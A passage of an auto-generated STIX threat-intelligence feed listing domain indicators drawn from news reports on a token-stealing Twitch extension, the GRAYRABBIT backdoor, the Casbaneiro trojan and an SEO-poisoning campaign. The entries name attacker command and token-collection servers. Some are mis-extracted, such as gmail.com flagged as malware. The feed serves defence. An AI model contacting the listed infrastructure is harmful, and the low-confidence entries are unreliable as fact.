'server.host']","pattern_type":"stix","valid_from":"2026-09-14T16:15:58.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-target-exposed-vite-dev-servers-to-steal-aws-azure-secrets/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--47fad8a7-26c5-4b3b-ac70-b2108addb50d","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: alexue4.dev","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: m Developer email listed by chrome-stats Website identifier alexue4[.]dev Copyright identifier linked to the operator IP address 15","pattern":"[domain-name:value = 'alexue4.dev']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--de109665-2be7-4b33-ab26-53cd7a786c38","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: api.jeetbot.cc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: 7[.]186 netcup GmbH, Germany, AS197540; hosts jeetbot[.]cc, api[.]jeetbot[.]cc, enhanced[.]jeetbot[.]cc, and enhanced-1[.]jeetbot[.]cc","pattern":"[domain-name:value = 'api.jeetbot.cc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c24a2bd3-a984-4c65-aeb3-c2b3cae86f51","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: drisnya.online","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: 6154; hosts ext-styles[.]jeetbot[.]cc, morphilina[.]me, and drisnya[.]online IP address 80[.]74[.]26[.]162 CLODO Cloud, AS216154; host","pattern":"[domain-name:value = 'drisnya.online']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--65963547-5a1a-479f-9ab8-9d3593a69c3a","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: enhanced-1.jeetbot.cc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: tbot[.]cc, api[.]jeetbot[.]cc, enhanced[.]jeetbot[.]cc, and enhanced-1[.]jeetbot[.]cc IP address 132[.]243[.]113[.]25 CLODO Cloud, AS216154;","pattern":"[domain-name:value = 'enhanced-1.jeetbot.cc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1c740ebc-9a32-4739-82b7-08369ac6d635","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: enhanced.jeetbot.cc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: Germany, AS197540; hosts jeetbot[.]cc, api[.]jeetbot[.]cc, enhanced[.]jeetbot[.]cc, and enhanced-1[.]jeetbot[.]cc IP address 132[.]243[.]1","pattern":"[domain-name:value = 'enhanced.jeetbot.cc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fdb8bdeb-b949-4b84-86b0-8672f9534ea2","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: ext-03.jeetbot.cc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: IP address 80[.]74[.]26[.]162 CLODO Cloud, AS216154; hosts ext-03[.]jeetbot[.]cc Domain jeetbot[.]cc Operator-controlled domain Domain a","pattern":"[domain-name:value = 'ext-03.jeetbot.cc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--530aa006-950c-4c6b-a7dc-cde5ac9b3eb1","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: ext-styles.jeetbot.cc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: P address 132[.]243[.]113[.]25 CLODO Cloud, AS216154; hosts ext-styles[.]jeetbot[.]cc, morphilina[.]me, and drisnya[.]online IP address 80[.]","pattern":"[domain-name:value = 'ext-styles.jeetbot.cc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--25b9ca06-0fc9-4860-b624-c680052eef58","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: gmail.com","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: tbot[.]cc Operator contact address Email address cybergnyda@gmail[.]com Developer email listed by chrome-stats Website identifier","pattern":"[domain-name:value = 'gmail.com']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e935e91f-e770-483a-9f8c-1ae15fab5ee6","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: img.drisnya.online","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: elper/ Public extension-helper API endpoint Screenshot host img[.]drisnya[.]online Image hosting endpoint associated with the operation Hi","pattern":"[domain-name:value = 'img.drisnya.online']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8ee2e704-12d5-4eed-bb25-429a223e8821","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: jeetbot.cc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: ssociated with the extension listings Email address support@jeetbot[.]cc Operator contact address Email address cybergnyda@gmail[.","pattern":"[domain-name:value = 'jeetbot.cc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--de990cc5-fc67-49a8-89e7-d05464c651ba","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: morphilina.me","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: ]25 CLODO Cloud, AS216154; hosts ext-styles[.]jeetbot[.]cc, morphilina[.]me, and drisnya[.]online IP address 80[.]74[.]26[.]162 CLODO","pattern":"[domain-name:value = 'morphilina.me']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d70b3c77-5cec-46a7-aee6-8ae96714dc56","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: proxy.morphilina.me","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: jeetbot[.]cc Alternate operator proxy C2 and proxy endpoint proxy[.]morphilina[.]me Token-strip proxy endpoint Configuration endpoint ext-s","pattern":"[domain-name:value = 'proxy.morphilina.me']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0ff4324a-6694-4976-840d-32def25897d5","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: proxy.thebeholder.deno.net","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: up token-collection endpoint Historical collection endpoint proxy[.]thebeholder[.]deno[.]net/set-token Decommissioned backup token-collection endp","pattern":"[domain-name:value = 'proxy.thebeholder.deno.net']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--554235b9-aef6-4be4-a7d0-29d57662af6c","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: thebeholderbotapi.vercel.app","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: ssioned backup token-collection endpoint Privacy-policy URL thebeholderbotapi[.]vercel[.]app/twitch-conf Privacy-policy host cited in the investigat","pattern":"[domain-name:value = 'thebeholderbotapi.vercel.app']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ca61b7ae-c643-4e83-a2fe-f54a0c725870","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: thebeholder-proxy.deno.dev","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: ed token-collection endpoint Historical collection endpoint thebeholder-proxy[.]deno[.]dev/set-token Decommissioned backup token-collection endpoi","pattern":"[domain-name:value = 'thebeholder-proxy.deno.dev']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--986b7e79-a955-471a-95d6-7acc647f8168","created":"2026-09-14T13:01:36.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: mail.uaiubifas.top","description":"Seen in \"One Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users\" (Cyber Security News). Context: Staging server hosted on Alibaba Cloud in Hong Kong Domain mail.uaiubifas.top GRAYRABBIT command-and-control domain using port 443 SHA-25","pattern":"[domain-name:value = 'mail.uaiubifas.top']","pattern_type":"stix","valid_from":"2026-09-14T13:01:36.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/one-click-on-a-malicious-link/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--aab37d81-0f01-4337-b563-a7980fef34d6","created":"2026-09-14T13:01:36.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: noht1ng.top","description":"Seen in \"One Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users\" (Cyber Security News). Context: thod protocol link used to trigger the exploit chain Domain noht1ng.top Exploit-page hosting domain IP address 8.218.50.207 Staging","pattern":"[domain-name:value = 'noht1ng.top']","pattern_type":"stix","valid_from":"2026-09-14T13:01:36.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/one-click-on-a-malicious-link/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--66fe6380-fc14-4222-a62c-6e420ee9f559","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: 115.201.178.68.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 115[.]201[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 181[.]202[.]178[","pattern":"[domain-name:value = '115.201.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a435fc94-5b67-4c52-9bb6-f1a9b78fd215","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: 116.181.62.50.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 116[.]181[.]62[.]50[.]host[.]secureserver[.]net Campaign infrastructure Domain 48[.]178[.]169[.","pattern":"[domain-name:value = '116.181.62.50.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5d4cd7f2-93d1-479d-8acd-b415516e95b2","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: 128.200.178.68.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: a0c2f5a2cf5ca8f955ee3375e3ca66a5dc52b HTA downloader Domain 128[.]200[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 13[.]189[.]202[.","pattern":"[domain-name:value = '128.200.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6a960370-8be8-4caf-8982-eb5eca4f639f","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: 129.202.178.68.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 129[.]202[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 76[.]180[.]62[.]","pattern":"[domain-name:value = '129.202.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d22e2fb9-6455-4901-9cd5-46e294cc34b6","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: 13.189.202.64.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 13[.]189[.]202[.]64[.]host[.]secureserver[.]net Campaign infrastructure Domain 116[.]181[.]62[.","pattern":"[domain-name:value = '13.189.202.64.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4c522045-8146-41bd-94fc-6f3d27d9f566","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: 135.201.178.68.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 135[.]201[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 85[.]182[.]62[.]","pattern":"[domain-name:value = '135.201.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3ed3d1c4-b270-4dfd-af4b-bee532683c93","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: 162.201.178.68.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 162[.]201[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 129[.]202[.]178[","pattern":"[domain-name:value = '162.201.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e587448b-beb8-4d67-a61e-cebf3c46093f","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: 181.202.178.68.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 181[.]202[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 135[.]201[.]178[","pattern":"[domain-name:value = '181.202.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3486bcac-1139-4b08-ab3d-be3cc6943de3","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: 48.178.169.192.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 48[.]178[.]169[.]192[.]host[.]secureserver[.]net Campaign infrastructure Domain 115[.]201[.]178[","pattern":"[domain-name:value = '48.178.169.192.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6ebd9b95-1963-45d9-8b75-76af462b9673","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: 76.180.62.50.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 76[.]180[.]62[.]50[.]host[.]secureserver[.]net Campaign infrastructure Domain gexwalltool[.]co","pattern":"[domain-name:value = '76.180.62.50.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--08017dc9-2b7d-4139-b5f5-ec15c41861c3","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: 85.182.62.50.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 85[.]182[.]62[.]50[.]host[.]secureserver[.]net Campaign infrastructure Domain 162[.]201[.]178[","pattern":"[domain-name:value = '85.182.62.50.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a42d1d8d-c3ee-4564-a123-6ec6985acff2","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: gexwalltool.com","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain gexwalltool[.]com Campaign infrastructure Domain x-wolverine[.]servebbs[.]c","pattern":"[domain-name:value = 'gexwalltool.com']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7828ab59-73ad-420d-8efe-0022ca5b5f93","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: x-wolverine.servebbs.com","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: ure Domain gexwalltool[.]com Campaign infrastructure Domain x-wolverine[.]servebbs[.]com Campaign infrastructure IP address 72[.]167[.]48[.]63 C","pattern":"[domain-name:value = 'x-wolverine.servebbs.com']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--13433bc6-31d5-403e-96b9-ffd4f8491b99","created":"2026-09-14T08:09:26.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: noht1ng.top","description":"Seen in \"China-Linked Hackers Exploit Sogou One-Click RCE to Deploy GRAYRABBIT Backdoor\" (GBHackers). Context: ryption RC4-encrypted communications Exploit-hosting domain noht1ng[.]top Staging-server IP address 8.218.50[.]207 Staging-server p","pattern":"[domain-name:value = 'noht1ng.top']","pattern_type":"stix","valid_from":"2026-09-14T08:09:26.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/grayrabbit-backdoor/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--abf8519f-f9c6-4048-b2b1-fef71f54bbb7","created":"2026-09-14T08:09:26.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: uaiubifas.top","description":"Seen in \"China-Linked Hackers Exploit Sogou One-Click RCE to Deploy GRAYRABBIT Backdoor\" (GBHackers). Context: re. In this campaign, the payload reportedly contacted mail.uaiubifas[.]top over raw TCP port 443 and encrypted fixed-size 4,096-byte","pattern":"[domain-name:value = 'uaiubifas.top']","pattern_type":"stix","valid_from":"2026-09-14T08:09:26.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/grayrabbit-backdoor/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8ded8c7e-a790-44be-b91c-82241e48ec44","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: achievershelf.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: to CL-CRI-1171 activity and subsequently taken down Domain achievershelf[.]space ; activitymeal[.]space ; additionplot[.]cfd ; adviceturn[","pattern":"[domain-name:value = 'achievershelf.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ba9643d5-8a9c-4b81-a726-bb15be8306db","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: activitykitty.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: CL-CRI-1171 gate and landing infrastructure Domain connect.activitykitty[.]xyz ; connect.apparatustaste[.]xyz ; connect.armcard[.]xyz ;","pattern":"[domain-name:value = 'activitykitty.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a0f840d1-f098-414e-b2df-808a0fe60c37","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: activitymeal.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: and subsequently taken down Domain achievershelf[.]space ; activitymeal[.]space ; additionplot[.]cfd ; adviceturn[.]xyz ; afternoonscrew[","pattern":"[domain-name:value = 'activitymeal.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security 